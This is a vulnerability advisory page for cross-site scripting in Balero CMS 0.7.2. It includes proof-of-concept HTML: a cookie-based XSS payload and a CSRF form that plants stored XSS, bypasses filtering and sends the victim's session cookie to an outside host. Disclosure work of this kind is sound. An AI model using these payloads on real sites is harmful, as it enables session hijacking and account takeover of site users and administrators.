Balero CMS 0.7.2 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

<!-- Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities Vendor: BaleroCMS Software Product web page: Affected version: 0.7.2 Summary: Balero CMS is an open source project that can help you manage the page of your company with just a few guided steps, minimizing the costs that many companies make to have your advertising medium and/or portal. Desc: Input passed to the 'content' POST parameter and the cookie 'counter' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5239 Advisory URL: 04.03.2015 --> <html> <body> <script> document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/"; </script> </body> </html> csrf+stored xss+filter bypass+session hijack: <html> <body> <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST"> <input type="hidden" name="title" value="ZSL" /> <input type="hidden" name="content" value="pwned&lt;&#47;textarea&gt;&lt;s&#92;cript&gt;document&#46;location&#61;&quot;http&#58;&#47;&#47;www&#46;zeroscience&#46;mk&#47;pentest&#47;cthief&#46;php&#63;cookie&#61;&quot;&#43;docu&#92;ment&#46;cookie&#59;&lt;&#47;s&#92;cript&gt;" /> <input type="hidden" name="files" value="joxy&#46;poxy" /> <input type="hidden" name="delete&#95;post&#91;&#93;" value="135" /> <input type="hidden" name="id" value="135" /> <input type="hidden" name="submit" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top